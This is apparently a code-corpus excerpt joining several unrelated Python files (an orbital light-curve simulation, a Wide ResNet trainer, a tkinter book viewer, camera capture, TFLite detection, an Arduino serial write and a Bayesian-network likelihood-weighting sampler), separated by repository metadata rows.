giant.radius = 4e10
giant.color = color.yellow
giant.mass = 4e30
dwarf = sphere()
dwarf.material = materials.earth
dwarf.pos = vector(1.5e11,0,0)
dwarf.radius = 1e10
dwarf.color = color.white
dwarf.mass = 1e29
# Opposite momenta so the two-body system's total momentum is zero.
dwarf.p = vector(0, 0, 2.6E4) * dwarf.mass
giant.p= -dwarf.p
initial = dwarf.pos.x
L = {}
'''def change(): # Called by controls when button clicked
if b.text == 'Click me':
b.text = 'Try again'
else:
b.text = 'Click me'
'''
'''c = controls() # Create controls window
# Create a button in the controls window:
b = slider( pos = (-50,0),
action=lambda: change() )'''
t = 0
# Give each body a trail curve so its orbit is traced on screen.
for a in [giant, dwarf]:
    a.orbit = curve(color=a.color, radius = 5e8)
dt = 86400
size = 0.025
R = 5
scene = display(title='Light curve', center = (0,0,0),width=400, height=450)
'''
camera = vector(0,0,R) # for generality; need not be at origin
# Place center of scene at a distance R from the camera:
# Point the camera:
scene.forward = scene.center-camera
# scene.fov is "field of view" in radians. R times the tangent
# of half the field of view is half of the width of the scene:
scene.range = R*tan(scene.fov/2)
scene.userspin = False
down = False
lastpos = None
'''
#ruler
# Axes for the light-curve plot (x = phase, y = relative flux).
ruler1 = ruler.ruler(vector(0, 0, 0), vector(2,0,0), unit = 0.1, length = 1.0, thickness = 0.01)
ruler2 = ruler.ruler(vector(0, 0, 0), vector(0,2,0), unit = 0.1, length = 1.1, thickness = 0.01)
#normal ball
# Marker that traces the light curve as the simulation advances.
ball = sphere(radius = size, color=color.white, make_trail=True) # ball
ball.pos = vector( 0.0, 1.0, 0.0)
ball.orbit = curve(color=color.cyan, radius = 0.01)
# Main simulation loop: leapfrog-style momentum/position updates plus
# light-curve plotting.  Runs until the window is closed.
while 1:
    rate(100)
    '''
    if scene.mouse.events:
    m = scene.mouse.getevent()
    if m.press == 'left':
    down = True
    elif m.release == 'left':
    down = False
    if down: # and scene.mouse.pos != lastpos:
    lastpos = scene.mouse.pos
    lastpos.y = 0 # force mouse position to have y=0
    # (lastpos-camera) is a vector parallel to screen.
    # (lastpos-camera) cross norm(forward) is a vector in the +y direction,
    # and this y component of the cross product is proportional to
    # how far to the right the mouse is (if mouse is to left, this y
    # component is negative)
    rotation = cross((lastpos-camera),norm(scene.forward))
    # If the mouse is to the right, y component is positive, and we need to
    # turn the view toward the right, which means rotating the forward
    # vector toward the right, about the +y axis, which requires a
    # negative angle (vice versa if mouse is to the left, in which case
    # the cross product is in the -y direction. The factor of 1/100 was
    # chosen experimentally as giving an appropriate sensitivity to how
    # far to the right (or left) the mouse is. Bigger mouse displacement
    # makes the rotation faster.
    scene.forward = scene.forward.rotate(angle=-rotation.y/100, axis=(0,1,0))
    # Move the center of the scene to be a distance R from the camera,
    # in the direction of forward.
    scene.center = camera+R*norm(scene.forward)'''
    dist = dwarf.pos - giant.pos
    distance = int(abs(dwarf.pos.x - giant.pos.x))
    # While the planet is close enough in x AND on the near (positive z)
    # side of the star, look up the occulted flux; otherwise flux is 1.
    if distance < 2*giant.radius-5e9 and (dwarf.pos.z- giant.pos.z > 0):
        # NOTE: Python-2 print statement -- this script targets Python 2
        # and the classic "visual" (VPython 5/6) module.
        print distance, ll(distance)
        ball.pos.y = ll(distance)
    else:
        ball.pos.y = 1
    # Newtonian gravity on the line between the bodies (G ~ 6.7e-11).
    force = 6.7e-11 * giant.mass * dwarf.mass / mag(dist)**2 * (dist/mag(dist))
    giant.p = giant.p + force*dt
    dwarf.p = dwarf.p - force*dt
    for a in [giant, dwarf]:
        a.pos = a.pos + a.p/a.mass * dt
        a.orbit.append(pos=a.pos)
    # Sweep the light-curve marker across one unit of x per period
    # (30067200 s, presumably one orbital period -- TODO confirm).
    ball.pos.x=((t/30067200.)%1)
    if (t<30067200):
        ball.orbit.append(pos=ball.pos)
    t += dt
|
[
"[email protected]"
] | |
91fa7b6d40e65ea18eb2197ca31dc47643533e46
|
e184ff3752870a2a4fc7c7c606ed54344085c431
|
/CIFAR/Wide_ResNet/Train.py
|
d075ed6c47f47373c426a6f3ed4a8a3838adc793
|
[] |
no_license
|
leesc912/ResNet
|
2538095c4564c8c17a8d27677ae64f0b7c5942b0
|
708693d966859f1620d1d71fe25dbd62d41cb31a
|
refs/heads/master
| 2020-12-30T08:27:28.053185 | 2020-02-18T14:04:32 | 2020-02-18T14:04:32 | 238,928,673 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,922 |
py
|
from pathlib import Path
import tensorflow as tf
from tensorflow.keras import backend as K
from Model import make_resnet
from Dataset import get_dataset
from Top_K_Accuracy import custom_top_k_metrics
from Save import Recoder
from Checkpoint import load_checkpoint
from Utils import create_folder, save_model_info
class Trainer() :
    """Drives training/evaluation of a Wide ResNet on CIFAR.

    The constructor wires up the model, datasets, metrics and log folders
    from the ``kwargs`` produced by the CLI; ``start()`` then dispatches
    to ``train()`` or ``test()`` depending on the selected mode.
    """
    def __init__(self, **kwargs) :
        # Mode selection: --test / --plot flags win over the default "train".
        if kwargs["test"] :
            self.mode = "test"
        elif kwargs["plot"] :
            self.mode = "plot"
        else :
            self.mode = "train"
        result_folder = kwargs["result_folder"]
        # Optimiser hyper-parameters are only needed when training.
        if self.mode == "train" :
            self.initial_epoch = 1
            self.epochs = kwargs["epochs"]
            self.lr = kwargs["lr"]
            self.sgd_momentum = kwargs["sgd_momentum"]
        self.num_category = kwargs["num_category"]
        self.use_label_smoothing = kwargs["label_smoothing"]
        # Wide ResNet depth constraint: (L - 4) must divide evenly into
        # 3 groups of `deepening_factor` blocks.
        if (kwargs["num_layers"] - 4) % (3 * kwargs["deepening_factor"]) :
            raise Exception("({} - 4) % (3 * {}) != 0".format(kwargs["num_layers"], kwargs["deepening_factor"]))
        if self.mode != "plot" :
            self.ckpt_path = kwargs["ckpt_path"]
            self.ckpt_epoch = kwargs["ckpt_epoch"]
        log_folder, self.ckpt_folder = create_folder(result_folder)
        if self.mode == "train" :
            result_file = log_folder / "training_result.txt"
            simple_result_file = log_folder / "training_result_summary.csv"
            self.recoder = Recoder(result_file, simple_result_file)
        top_k_file = log_folder / "top_k_accuracy.csv"
        # Zero-padding shortcuts = identity; otherwise 1x1 projection.
        shortcut = "identity" if kwargs["zero_padding"] else "projection"
        self.resnet = make_resnet(self.num_category, kwargs["num_layers"], kwargs["bn_momentum"], kwargs["widening_factor"],
            kwargs["deepening_factor"], shortcut)
        # Test mode evaluates top-k on the test split; train mode on the
        # validation split.
        if self.mode == "test" :
            _, _, self.test_dataset, _, _, self.num_test = get_dataset(kwargs["batch_size"], self.num_category, self.use_label_smoothing)
            self.top_k_accuracy = custom_top_k_metrics(self.resnet, self.test_dataset, top_k_file, self.num_category, 10,
                self.num_test, self.use_label_smoothing)
        elif self.mode == "train" :
            self.train_dataset, self.val_dataset, _, self.num_train, self.num_val, _ = get_dataset(kwargs["batch_size"], self.num_category,
                self.use_label_smoothing)
            self.top_k_accuracy = custom_top_k_metrics(self.resnet, self.val_dataset, top_k_file, self.num_category, 10,
                self.num_val, self.use_label_smoothing)
        # Save the kwargs values (persist the run configuration to disk).
        msg = ""
        for k, v in list(kwargs.items()) :
            msg += "{} = {}\n".format(k, v)
        msg += "new model checkpoint path = {}\n".format(self.ckpt_folder)
        with (log_folder / "model_settings.txt").open("w", encoding = "utf-8") as fp :
            fp.write(msg)
        save_model_info(self.resnet, log_folder)
    def start(self) :
        """Dispatch to test() or train() depending on the selected mode."""
        if self.mode == "test" :
            self.test()
        elif self.mode == "train" :
            self.train()
    def train(self) :
        """Run the training loop, checkpointing and logging every epoch."""
        self.opt = tf.keras.optimizers.SGD(lr = self.lr, momentum = self.sgd_momentum, nesterov = True)
        self.train_loss_metric = tf.keras.metrics.Mean(name = "train_loss")
        # Label smoothing requires one-hot targets (Categorical*); plain
        # integer labels use the Sparse* variants.  The tf.function input
        # signature differs accordingly.
        if self.use_label_smoothing :
            self.train_acc_metric = tf.keras.metrics.CategoricalAccuracy(name = "train_acc")
            self.loss_function = tf.keras.losses.CategoricalCrossentropy(from_logits = True)
            train_function = tf.function(self.forward, input_signature = [tf.TensorSpec((None, 32, 32, 3), tf.float32),
                tf.TensorSpec((None, self.num_category), tf.float32)])
        else :
            self.train_acc_metric = tf.keras.metrics.SparseCategoricalAccuracy(name = "train_acc")
            self.loss_function = tf.keras.losses.SparseCategoricalCrossentropy(from_logits = True)
            train_function = tf.function(self.forward, input_signature = [tf.TensorSpec((None, 32, 32, 3), tf.float32),
                tf.TensorSpec((None, 1), tf.int32)])
        ckpt = tf.train.Checkpoint(model = self.resnet, opt = self.opt)
        # Optionally resume model + optimizer state from a checkpoint.
        if self.ckpt_path is not None :
            fname, self.initial_epoch = load_checkpoint(Path(self.ckpt_path).resolve(), self.ckpt_epoch)
            print("\nCheckpoint File : {}\n".format(fname))
            ckpt.mapped = {"model" : self.resnet, "opt" : self.opt}
            ckpt.restore(fname)
            # Restore overwrites the learning rate; reset it to the CLI value.
            K.set_value(self.opt.lr, self.lr)
        progbar = tf.keras.utils.Progbar(target = self.num_train)
        for epoch in range(self.initial_epoch, self.epochs + 1) :
            self.train_loss_metric.reset_states()
            self.train_acc_metric.reset_states()
            self.recoder.set_start_train()
            for X, y in self.train_dataset :
                num_data = K.int_shape(y)[0]
                train_function(X, y)
                progbar.add(num_data)
            self.recoder.set_end_train()
            progbar.update(0)
            self.recoder.set_start_val()
            val_loss, val_acc = self.top_k_accuracy.evaluate(epoch)
            self.recoder.set_end_val()
            train_loss = self.train_loss_metric.result()
            train_acc = self.train_acc_metric.result()
            # Checkpoint name encodes epoch and both losses for easy triage.
            ckpt_prefix = self.ckpt_folder / "Epoch-{}_TLoss-{:.4f}_VLoss-{:.4f}".format(epoch, train_loss, val_loss)
            ckpt.save(file_prefix = ckpt_prefix)
            self.recoder.record(epoch, self.opt.get_config()["learning_rate"], train_acc.numpy(), train_loss.numpy(),
                val_acc, val_loss.numpy())
    def test(self) :
        """Restore model weights from a checkpoint and evaluate on the test set."""
        ckpt = tf.train.Checkpoint(model = self.resnet)
        fname, _ = load_checkpoint(Path(self.ckpt_path).resolve(), self.ckpt_epoch)
        print("\nCheckpoint File : {}\n".format(fname))
        # Load only the model (optimizer state is intentionally skipped).
        ckpt.mapped = {"model" : self.resnet}
        ckpt.restore(fname).expect_partial()
        self.top_k_accuracy.evaluate("Test")
    def forward(self, inputs, labels) :
        """One training step: forward pass, loss, gradients, metric update."""
        with tf.GradientTape() as tape :
            logits = self.resnet(inputs, training = True)
            loss = self.loss_function(labels, logits)
        grads = tape.gradient(loss, self.resnet.trainable_variables)
        self.opt.apply_gradients(zip(grads, self.resnet.trainable_variables))
        self.train_loss_metric.update_state(loss)
        self.train_acc_metric.update_state(labels, logits)
|
[
"[email protected]"
] | |
c1be505f37b49fa56d97535248dfdf448e20dd52
|
84039fd2f35d5859b7507da6542dd31a51d9e0ed
|
/viewOwnedBooks.py
|
3c2e237530924d33dbea1ab4ed48e4b776e1deef
|
[] |
no_license
|
bri1315/libraryStorage
|
ead12bec708cb0ce6eb9a022d3a4628a96675663
|
19e15ef6f5eaac42550051e84f56ee8e9036471d
|
refs/heads/main
| 2023-02-26T19:01:19.848645 | 2021-02-06T00:55:08 | 2021-02-06T00:55:08 | 336,424,325 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,352 |
py
|
#code coped from my own viewbooks.py code
import tkinter
from tkinter import *
import tkinter.ttk as ttk
from PIL import ImageTk,Image #PIL -> Pillow
import pymysql
#from tkinter import messagebox
# Open the MySQL connection used by every query in this module.
# NOTE(review): credentials are hard-coded and the password looks like a
# redacted placeholder ("####s") -- replace before running, and prefer
# loading credentials from the environment or a config file.
con = pymysql.connect(host = "localhost", user = "root", passwd = "####s", database = "books")
mycursor = con.cursor()
#table name and setting it into libraryTable
libraryTable = "library"
def sortByTitle():
    """Repopulate the grid (rows 3+) with owned books ordered by title.

    Reads via the module-level ``mycursor`` and draws one Label per
    column into the module-level ``root`` window.
    """
    try:
        mycursor.execute("SELECT title, author, haveIRead, owned, price FROM library WHERE owned = 'yes' ORDER BY title")
        i = 3  # rows 0-2 hold the buttons and column headers
        for library in mycursor:
            for j in range(len(library)):
                populate = Label(root, width = 25, text = library[j], borderwidth=2,relief='ridge', anchor="w", bg = 'pink')
                populate.grid(row = i, column = j)
            i = i + 1
    except Exception:
        # BUG fix: `messagebox` is a tkinter submodule that is NOT exported
        # by `from tkinter import *`, so the old handler raised NameError.
        # Import it locally, pass an explicit title AND message (a single
        # argument becomes the window title, leaving the dialog empty),
        # and narrow the bare `except:` so SystemExit/KeyboardInterrupt
        # still propagate.
        from tkinter import messagebox
        messagebox.showinfo("Error", "Failed to open database")
def sortByAuthor():
    """Repopulate the grid (rows 3+) with owned books ordered by author.

    Reads via the module-level ``mycursor`` and draws one Label per
    column into the module-level ``root`` window.
    """
    try:
        mycursor.execute("SELECT title, author, haveIRead, owned, price FROM library WHERE owned = 'yes' ORDER BY author")
        i = 3  # rows 0-2 hold the buttons and column headers
        for library in mycursor:
            for j in range(len(library)):
                populate = Label(root, width = 25, text = library[j], borderwidth=2,relief='ridge', anchor="w", bg = 'pink')
                populate.grid(row = i, column = j)
            i = i + 1
    except Exception:
        # BUG fix: `messagebox` is a tkinter submodule that is NOT exported
        # by `from tkinter import *`, so the old handler raised NameError.
        # Import it locally, pass an explicit title AND message, and narrow
        # the bare `except:`.
        from tkinter import messagebox
        messagebox.showinfo("Error", "Failed to open database")
def viewOwnedBooks():
    """Open a window listing owned books with sort-by-title/author buttons."""
    #setting up global variables in order to use them in other functions
    # (the sort callbacks draw into `root`)
    global root
    #setting the window up
    root = tkinter.Tk()
    root.title("Viweing My Personal library")
    root.geometry("950x405")
    root.configure(bg = 'pink')
    #setting up the headers and describing what information will be populated
    viewTitle = Label(root, text = 'View Books that are owned', fg = "white", bg = 'pink',font = ("Times", 20))
    viewTitle.grid(row = 0, column = 1)
    titleBtn = Button(root, text = "Sort by Title", bg = 'pink', command = sortByTitle)
    titleBtn.grid(row = 0, column = 0)
    authorBtn = Button(root, text = "Sort by Author", bg = 'pink', command = sortByAuthor)
    authorBtn.grid(row = 0, column = 2)
    # NOTE: local name `quit` shadows the builtin quit(); harmless here.
    quit = Button(root, text = "Quit", command = root.destroy)
    quit.grid(row = 0, column = 3)
    # Column headers on row 2; the sort callbacks fill rows 3 and below.
    titlePlace = Label(root, width = 25, text = 'Title: ', anchor="w", bg = 'pink',fg = "white", font = ("Times", 16))
    titlePlace.grid(row = 2, column = 0)
    authorPlace = Label(root, width = 25, text = 'Author: ', anchor="w", bg = 'pink',fg = "white", font = ("Times", 16))
    authorPlace.grid(row = 2, column = 1)
    readPlace = Label(root, width = 20, text = 'Read: ', anchor="w", bg = 'pink',fg = "white", font = ("Times", 16))
    readPlace.grid(row = 2, column = 2)
    ownedPlace = Label(root, width = 20, text = 'Owned: ', anchor="w", bg = 'pink',fg = "white", font = ("Times", 16))
    ownedPlace.grid(row = 2, column = 3)
    pricePlace = Label(root, width = 20, text = 'Price: ', anchor="w", bg = 'pink',fg = "white", font = ("Times", 16))
    pricePlace.grid(row = 2, column = 4)
    root.mainloop()
|
[
"[email protected]"
] | |
d022d56454d570a5b887704c79d4d2843271f345
|
576cc83449e10fd3f98281970c46016ea7a5aea2
|
/OpenCV拟合与特征点识别/模板匹配角度.py
|
78abfbc17a54a507b14bd408976b16d378badf18
|
[] |
no_license
|
HotView/PycharmProjects
|
215ab9edd341e3293daebcf86d97537f8cd28d75
|
61393fe5ba781a8c1216a5cbe7e0d06149a10190
|
refs/heads/master
| 2020-06-02T07:41:53.608742 | 2019-11-13T08:31:57 | 2019-11-13T08:31:57 | 191,085,178 | 3 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 171 |
py
|
import math

# Convert a few arctangent values from radians to degrees and print them.
# The exact expressions (x*180/math.pi, not math.degrees) are kept so the
# printed floating-point values are bit-identical to the original script.
a = math.atan(2/3)
c = math.atan(1)
print(c*180/math.pi)
print(a*180/math.pi)
b = math.atan(6/2)
print(b*180/math.pi)
|
[
"[email protected]"
] | |
0cc2744a4a439488ad0a2d1c8ac0c3dc0fd24949
|
949a41c0e48e8f646fac4c970733a33f5fb920b2
|
/image_capture/exposure-image.py
|
dc0fb62ea7820489752006089d26646ccea178c4
|
[] |
no_license
|
srconstantin/daphnia
|
39f1233e3511bad27aaae8aba25a2be4923be8ca
|
03b43889a083147efa48deea1b88fdcbcd7fa991
|
refs/heads/master
| 2020-04-24T05:26:54.956261 | 2020-01-23T21:27:54 | 2020-01-23T21:27:54 | 171,735,164 | 2 | 1 | null | 2019-04-18T18:57:25 | 2019-02-20T19:23:06 |
C++
|
UTF-8
|
Python
| false | false | 1,081 |
py
|
#!/usr/bin/python3.6
from pypylon import pylon
import sys
import platform
#this is a sample script, that captures a single image with a provided exposure time in the system arguments, and saves it to disk in this file's directory.
if len(sys.argv) < 2:
    sys.exit("Must provide exposure time in float as first argument!")
new_exposure = sys.argv[1]
img = pylon.PylonImage()
tlf = pylon.TlFactory.GetInstance()
# Attach to the first Basler camera found on the system.
camera = pylon.InstantCamera(tlf.CreateFirstDevice())
camera.Open()
# Serialise the current camera configuration to a string so the exposure
# value can be patched textually.
cur_config = pylon.FeaturePersistence.SaveToString(camera.GetNodeMap())
exposure_idx = cur_config.find("ExposureTime")
print(exposure_idx)
# NOTE(review): the +13/+25 offsets assume a fixed "ExposureTime" line
# layout in the dumped config; this string surgery is fragile and also
# replaces EVERY occurrence of the old value below -- confirm against the
# actual pylon config format.
exposure_val = cur_config[exposure_idx+13:exposure_idx+25].partition('\n')[0]
print(exposure_val)
cur_config = cur_config.replace(exposure_val, new_exposure)
pylon.FeaturePersistence.LoadFromString(cur_config, camera.GetNodeMap(), True)
# Grab one frame with the new exposure and save it as a PNG.
camera.StartGrabbing()
with camera.RetrieveResult(2000) as result:
    img.AttachGrabResultBuffer(result)
    img.Save(pylon.ImageFileFormat_Png, "expimage.png")
    img.Release()
camera.StopGrabbing()
camera.Close()
|
[
"[email protected]"
] | |
969538deb0182c0775bc12ebdc2b35d87705e26b
|
5c4d64d6432328e64d9c2cffcd101b266be37261
|
/Detection/TFLite_detection_image.py
|
f204e169eeb4caf8034f6bcdf33a82376202cdc2
|
[
"MIT"
] |
permissive
|
Final-Six-SIH2020/Detection-and-Classification
|
801e0e23c8d922f1ce54c73a1227ba98eabc7f26
|
d02074fa4e5ba455e011ffd5081cc3428245c4d8
|
refs/heads/master
| 2022-11-26T13:50:31.850632 | 2020-08-01T16:52:00 | 2020-08-01T16:52:00 | 279,120,714 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,720 |
py
|
######## Webcam Object Detection Using Tensorflow-trained Classifier #########
#
# Author: Evan Juras
# Date: 9/28/19
# Description:
# This program uses a TensorFlow Lite object detection model to perform object
# detection on an image or a folder full of images. It draws boxes and scores
# around the objects of interest in each image.
#
# This code is based off the TensorFlow Lite image classification example at:
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py
#
# I added my own method of drawing boxes and labels using OpenCV.
# Import packages
from tflite_runtime.interpreter import Interpreter
import tflite_runtime.interpreter as tflite
import os
import argparse
import cv2
import numpy as np
import sys
import glob
# Define and parse input arguments
# Command-line interface: model location, label map, detection threshold,
# and either a single image (--image) or a folder of images (--imagedir).
parser = argparse.ArgumentParser()
parser.add_argument(
    "-m", "--modeldir", help="Folder the .tflite file is located in", required=True
)
parser.add_argument(
    "-g", "--graph",
    help="Name of the .tflite file, if different than detect.tflite",
    default="detect.tflite",
)
parser.add_argument(
    "-l", "--labels",
    help="Name of the labelmap file, if different than labelmap.txt",
    default="labelmap.txt",
)
parser.add_argument(
    "-t", "--threshold",
    help="Minimum confidence threshold for displaying detected objects",
    default=0.4,
)
parser.add_argument(
    "-i", "--image",
    help="Name of the single image to perform detection on. To run detection on multiple images, use --imagedir",
    default=None,
)
parser.add_argument(
    "-id", "--imagedir",
    help="Name of the folder containing images to perform detection on. Folder must contain only images.",
    default=None,
)
parser.add_argument(
    "-s", "--savedir",
    help="Name of the folder to save results",
    default=None,
)
parser.add_argument(
    "--edgetpu",
    help="Use Coral Edge TPU Accelerator to speed up detection",
    action="store_true",
)
args = parser.parse_args()
# Unpack CLI arguments into module-level configuration.
MODEL_NAME = args.modeldir
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
use_TPU = args.edgetpu
savedir = args.savedir

# Parse input image name and directory.
IM_NAME = args.image
IM_DIR = args.imagedir

# If both an image AND a folder are specified, throw an error
if IM_NAME and IM_DIR:
    print(
        'Error! Please only use the --image argument or the --imagedir argument, not both. Issue "python TFLite_detection_image.py -h" for help.'
    )
    sys.exit()

# If neither an image or a folder are specified, default to using 'test1.jpg' for image name
if not IM_NAME and not IM_DIR:
    IM_NAME = "test1.jpg"

# Folder mode must say where to save results.
if IM_DIR and not savedir:
    print(
        'Error! Please specify the folder to save detection images in. Issue "python TFLite_detection_image.py -h" for help.'
    )
    sys.exit()

if savedir:
    if not os.path.isdir(savedir):
        os.makedirs(savedir)

CWD_PATH = os.getcwd()

# Define path to images and grab all image filenames
if IM_DIR:
    PATH_TO_IMAGES = os.path.join(CWD_PATH, IM_DIR)
    # BUG fix: the original used a hard-coded Windows separator
    # (PATH_TO_IMAGES + "\\*.jpg"), which finds nothing on Linux/macOS.
    # os.path.join produces the right separator on every platform.
    images = glob.glob(os.path.join(PATH_TO_IMAGES, "*.jpg"))
elif IM_NAME:
    PATH_TO_IMAGES = os.path.join(CWD_PATH, IM_NAME)
    images = glob.glob(PATH_TO_IMAGES)

# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH, MODEL_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH, LABELMAP_NAME)

# Load the label map
with open(PATH_TO_LABELS, "r") as f:
    labels = [line.strip() for line in f.readlines()]

# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == "???":
    del labels[0]

# Load the Tensorflow Lite model.
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()

# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]["shape"][1]
width = input_details[0]["shape"][2]

# Float models need input normalisation; quantized models take raw uint8.
floating_model = input_details[0]["dtype"] == np.float32
input_mean = 127.5
input_std = 127.5
# Loop over every image and perform detection
for image_path in images:
    # BUG fix: image_path.split('\\')[-1] only worked with Windows
    # separators; os.path.basename is equivalent there and also correct
    # on POSIX paths.
    image_name = os.path.basename(image_path)

    # Load image and resize to expected shape [1xHxWx3]
    image = cv2.imread(image_path)
    image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
    imH, imW, _ = image.shape
    image_resized = cv2.resize(image_rgb, (width, height))
    input_data = np.expand_dims(image_resized, axis=0)

    # Normalize pixel values if using a floating model (i.e. if model is non-quantized)
    if floating_model:
        input_data = (np.float32(input_data) - input_mean) / input_std

    # Perform the actual detection by running the model with the image as input
    # NOTE(review): this tensor() call discards its result and looks
    # redundant -- kept as-is pending confirmation it has no side effect.
    interpreter.tensor(interpreter.get_input_details()[0]["index"])
    interpreter.set_tensor(input_details[0]["index"], input_data)
    interpreter.invoke()

    # Retrieve detection results
    boxes = interpreter.get_tensor(output_details[0]["index"])[
        0
    ]  # Bounding box coordinates of detected objects
    classes = interpreter.get_tensor(output_details[1]["index"])[
        0
    ]  # Class index of detected objects
    scores = interpreter.get_tensor(output_details[2]["index"])[
        0
    ]  # Confidence of detected objects
    # Total number of detected objects (inaccurate and not needed)
    num = interpreter.get_tensor(output_details[3]['index'])[0]

    # Loop over all detections and draw detection box if confidence is above minimum threshold
    for i in range(len(scores)):
        if (scores[i] > min_conf_threshold) and (scores[i] <= 1.0):
            # Get bounding box coordinates and draw box
            # Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
            ymin = int(max(1, (boxes[i][0] * imH)))
            xmin = int(max(1, (boxes[i][1] * imW)))
            ymax = int(min(imH, (boxes[i][2] * imH)))
            xmax = int(min(imW, (boxes[i][3] * imW)))
            cv2.rectangle(image, (xmin, ymin), (xmax, ymax), (10, 255, 0), 2)

            # Draw label
            object_name = labels[
                int(classes[i])
            ]  # Look up object name from "labels" array using class index
            label = "%s: %d%%" % (
                object_name,
                int(scores[i] * 100),
            )  # Example: 'person: 72%'
            labelSize, baseLine = cv2.getTextSize(
                label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2
            )  # Get font size
            label_ymin = max(
                ymin, labelSize[1] + 10
            )  # Make sure not to draw label too close to top of window
            cv2.rectangle(
                image,
                (xmin, label_ymin - labelSize[1] - 10),
                (xmin + labelSize[0], label_ymin + baseLine - 10),
                (255, 255, 255),
                cv2.FILLED,
            )  # Draw white box to put label text in
            cv2.putText(
                image,
                label,
                (xmin, label_ymin - 7),
                cv2.FONT_HERSHEY_SIMPLEX,
                0.7,
                (0, 0, 0),
                2,
            )  # Draw label text

    # All the results have been drawn on the image, now display the image
    cv2.imshow("Object detector", image)
    # cv2.imwrite(os.path.join(CWD_PATH, savedir, image_name), image)

    # Press any key to continue to next image, or press 'q' to quit
    if cv2.waitKey(0) == ord("q"):
        break

# Clean up
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
983e0811328b47d5af184f898f004d1f0f7efbca
|
2e9c99f81a2552ebdc1f5ff3931cf92f7c68e6ab
|
/scripts/off.py
|
c238309a30a34e26113b212cce3f3ab2b092c7ad
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
brianma94/RaspiSecureSystem
|
36fb82abb7b5b4bedde41b32e75946ba54c65233
|
b045296a58dcb16c62866ec27fb0181af1c0d9f1
|
refs/heads/master
| 2021-01-12T07:41:02.304873 | 2016-12-20T17:09:42 | 2016-12-20T17:09:42 | 76,997,577 | 0 | 0 | null | 2016-12-20T22:51:09 | 2016-12-20T22:51:09 | null |
UTF-8
|
Python
| false | false | 95 |
py
|
import serial
# Open the Arduino's USB serial port at 9600 baud and send the single
# command character 'l' (the sketch on the Arduino interprets it).
# NOTE(review): pyserial 3.x on Python 3 requires bytes (b'l'); this str
# write suggests Python 2 / an older pyserial -- confirm the target runtime.
arduino = serial.Serial('/dev/ttyACM0',9600)
arduino.write('l')
arduino.close()
|
[
"[email protected]"
] | |
c97f7690cd4d98a44770cc65af7e42b9d7a88820
|
79109b9841f0476058899302418803e300ae9687
|
/Artificial_Intelligence/hw3/weighting.py
|
654d38f76a086e412e8ef28d6319ba94bec012e8
|
[] |
no_license
|
GartStav/WPI_projects
|
9894a750e33c5203d342a0b88a967752d63d3262
|
3ce9de7aa8e01579dbd229e12a9ddf7c0ffd5d7c
|
refs/heads/master
| 2020-08-07T12:22:01.034887 | 2015-08-31T03:49:41 | 2015-08-31T03:49:41 | 41,628,095 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,534 |
py
|
#-------------------------------------------------------------------------------
# Performs Likelihood weighting
#
# Author: Artem Gritsenko
# Worcester Polytechnic Intitute, 2013
#-------------------------------------------------------------------------------
import random
def sample(sample_var, bn, CPT, sample_results, evident_var):
parents = []
prob = 0
for i in range(len(bn[sample_var])):
if bn[i][sample_var] == 1:
if sample_results[i] == -1:
print("Error: CPT inconsistences")
else:
parents.append([i, sample_results[i]])
if parents == []:
if evident_var:
table_prob = CPT[sample_var][0][sample_var]
if sample_results[sample_var] == 1:
prob = table_prob
else:
prob = 1 - table_prob
else:
ran_prob = random.uniform(0,1)
if CPT[sample_var][0][sample_var] >= ran_prob:
sample_results[sample_var] = 1
else:
sample_results[sample_var] = 0
else:
for j in range(len(CPT[sample_var])):
found = True
k = 0
while found:
ind = parents[k][0]
if CPT[sample_var][j][ind] == parents[k][1]:
k += 1
else:
found = False
if k > len(parents)-1:
break
if found:
if evident_var:
table_prob = CPT[sample_var][j][sample_var]
if sample_results[sample_var] == 1:
prob = table_prob
else:
prob = 1 - table_prob
else:
ran_prob = random.uniform(0,1)
if CPT[sample_var][j][sample_var] >= ran_prob:
sample_results[sample_var] = 1
else:
sample_results[sample_var] = 0
break
return prob
def sampling(nb, CPT, evidences):
sample_results =[-1, -1, -1, -1]
for j in range(len(evidences)):
ind = evidences[j][0]
sample_results[ind] = evidences[j][1]
w = 1
for i in range(len(nb)):
dont_sample = False
for j in range(len(evidences)):
if evidences[j][0] == i:
dont_sample = True
break
if dont_sample:
w = w * sample(i, nb, CPT, sample_results, True)
else:
sample(i, nb, CPT, sample_results, False)
return [sample_results, w]
def wieghted_sampling(nb, CPT, query, evidences, num_samples):
num_true = 0
num_false = 0
result_true = 0.0
result_false = 0.0
for i in range(int(num_samples)):
[sample, w] = sampling(nb, CPT, evidences)
if sample[query] == 1:
result_true += w
num_true += 1
else:
result_false += w
num_false += 1
res = result_true/(result_true + result_false)
#res = (result_true*num_true + result_false*num_false)/int(num_samples)
return res
def set_the_network():
bn = [[0, 1, 1, 0], [0, 0, 0, 1], [0, 0, 0, 1], [0, 0, 0, 0]]
CPT_C = [[0.5, -1, -1, -1], [-1, -1, -1, -1], [-1, -1, -1, -1], [-1, -1, -1, -1]]
CPT_S = [[1, 0.1, -1, -1], [0, 0.5, -1, -1], [-1, -1, -1, -1], [-1, -1, -1, -1]]
CPT_R = [[1, -1, 0.8, -1], [0, -1, 0.2, -1], [-1, -1, -1, -1], [-1, -1, -1, -1]]
CPT_W = [[-1, 1, 1, 0.99], [-1, 1, 0, 0.9], [-1, 0, 1, 0.9], [-1, 0, 0, 0.0]]
